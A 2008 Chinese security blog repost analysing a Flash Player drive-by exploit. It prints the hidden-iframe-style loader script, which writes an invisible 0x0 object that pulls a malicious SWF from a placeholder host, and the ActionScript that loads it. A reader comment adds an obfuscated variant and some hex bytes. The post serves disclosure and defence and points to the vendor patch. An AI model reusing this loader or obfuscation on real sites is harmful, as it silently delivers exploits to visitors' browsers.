FLASH网马悄然现身互联网

鬼仔注：据说是Flash Player ActiveX 9.0.115以下版本。

来源：知道安全
发布日期：2008-5-26
最后更新日期：2008-5-26 17：37（GMT）

最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马，该网马通过网页加载一个正常的FLASH文件，再在那个FLASH文件里调用嵌入恶意构造的FLASH文件，这时会导致溢出，从而可能执行任意指令。以下为调用页内容：

<script>
window.onerror=function(){return true;}
function init(){window.status=”";}window.onload = init;
if(document.cookie.indexOf(”play=”)==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0)
{
document.write(’<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0″ width=”0″ height=”0″ align=”middle”>’);
document.write(’<param name=”allowScriptAccess” value=”sameDomain”/>’);
document.write(’<param name=”movie” value=”http://www.XXX.cn/flash/XX.swf”/>’);
document.write(’<param name=”quality” value=”high”/>’);
document.write(’<param name=”bgcolor” value=”#ffffff”/>’);
document.write(’<embed src=”http://www.XXX.cn/flash/XX.swf” mce_src=”http://www.XXX.cn/flash/XX.swf”/>’);
document.write(’</object>’);
}else
{document.write(”<EMBED src=http://www.XXX.cn/flash/XX.swf width=0 height=0>”);}}
</script>  以下为正常的FLASH文件使用的脚本：

// Action script…// [Action in Frame 1]
var flashVersion =/hxversion;
loadMovie(”http://www.XXX.cn/flash/” + flashVersion + “mal_swf.swf”, _root);
stop();

该恶意FLASH部分内容如下：

建议：
厂商补丁： Adobe
—–
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.adobe.com/go/getflash

楼被抢了 2 层了... 抢座、Rss 2.0或者 Trackback

回收站 | 2008-06-01 10:01 | #

鬼仔，貌似现在这个马又有新东东出来了
前几天我抓到的也就是你现在提的这个，我给个昨天才搞到的。
晕，不知道怎样传图片上来。
这次的SWF里已经没有了“图像”元件
“动作”里代码是这样：
// Action script…

// [Action in Frame 1]
function ()
{
\x03 = 2687 % 511 * 5;
return (eval(“\x03”));
} // End of the function
var \x01 = -118 + \x04\x05();
for (\x01 = eval(“\x01”) – 139; eval(“\x01”) == 927; \x01 = eval(“\x01”) + 687)
{
\x01 = eval(“\x01”) – 786;
if (false)
{
continue;
} // end if
} // end of for
\x01 = eval(“\x01”) + 67;
if (eval(“\x01”) == 971)
{
\x01 = eval(“\x01”) – 373;

} // end if
if (eval(“\x01”) == 137)
{
\x01 = eval(“\x01”) + 348;

} // end if
if (eval(“\x01”) == 403)
{
\x01 = eval(“\x01″) + 568;
if (!”\x0f”)
{
}
else
{
\x01 = eval(“\x01”) – 373;
} // end else if

} // end if
\x01 = eval(“\x01”) + 442;
if (eval(“\x01”) == 828)
{
\x01 = eval(“\x01”) – 26;

} // end if
if (eval(“\x01”) == 36)
{
\x01 = eval(“\x01”) + 232;
if (false)
{
}
else
{
\x01 = eval(“\x01”) + 500;
} // end else if

} // end if
if (eval(“\x01”) == 768)
{
\x01 = eval(“\x01”) – 665;

}
else
{
\x01 = eval(“\x01”) – 552;
if (eval(“\x01”) == 598)
{
\x01 = eval(“\x01”) – 113;

} // end if
\x01 = eval(“\x01”) – 250;
if (eval(“\x01”) == 141)
{
\x01 = eval(“\x01”) + 687;

} // end if
if (eval(“\x01”) == 268)
{
\x01 = eval(“\x01”) + 500;

} // end if
if (eval(“\x01”) == 673)
{
\x01 = eval(“\x01”) + 129;

} // end if
\x01 = eval(“\x01”) + 326;
var \x0f = 1;
if (eval(“\x01”) == 945)
{
\x01 = eval(“\x01”) – 357;

} // end if
if (eval(“\x01”) == 103)
{
\x01 = eval(“\x01”) – 103;

} // end if

} // end else if

跟以前不一样了
另外还有两个“unknown”和”file attributes”的标签，
“file attributes”的十六进制是：44 11 00 00 00
unknown 0 是：C1 3F 20
7F 3F 4D 01 00 00 E0 93 D3 85 87 0B 74 2F B2 5C A2 2B AD C5 42 04 50 D8 A4 87 8B A6 A6 5E 10 6C 32 78 26 40 D7 02

和以前的有很大的区别了，照你说的那样改也是不行的了。

回复该留言

1 Trackbacks/Pingbacks

Flash 0day生成器 | 鬼仔’s Blog | 2008-05-29 20:51 | #

鬼仔's Blog

FLASH网马悄然现身互联网

楼被抢了 2 层了... 抢座、Rss 2.0或者 Trackback

1 Trackbacks/Pingbacks

发表评论

分类

最新日志

最新评论

鬼仔's Blog

FLASH网马悄然现身互联网

相关日志

楼被抢了 2 层了... 抢座、Rss 2.0或者 Trackback

1 Trackbacks/Pingbacks

发表评论

分类

最新日志

最新评论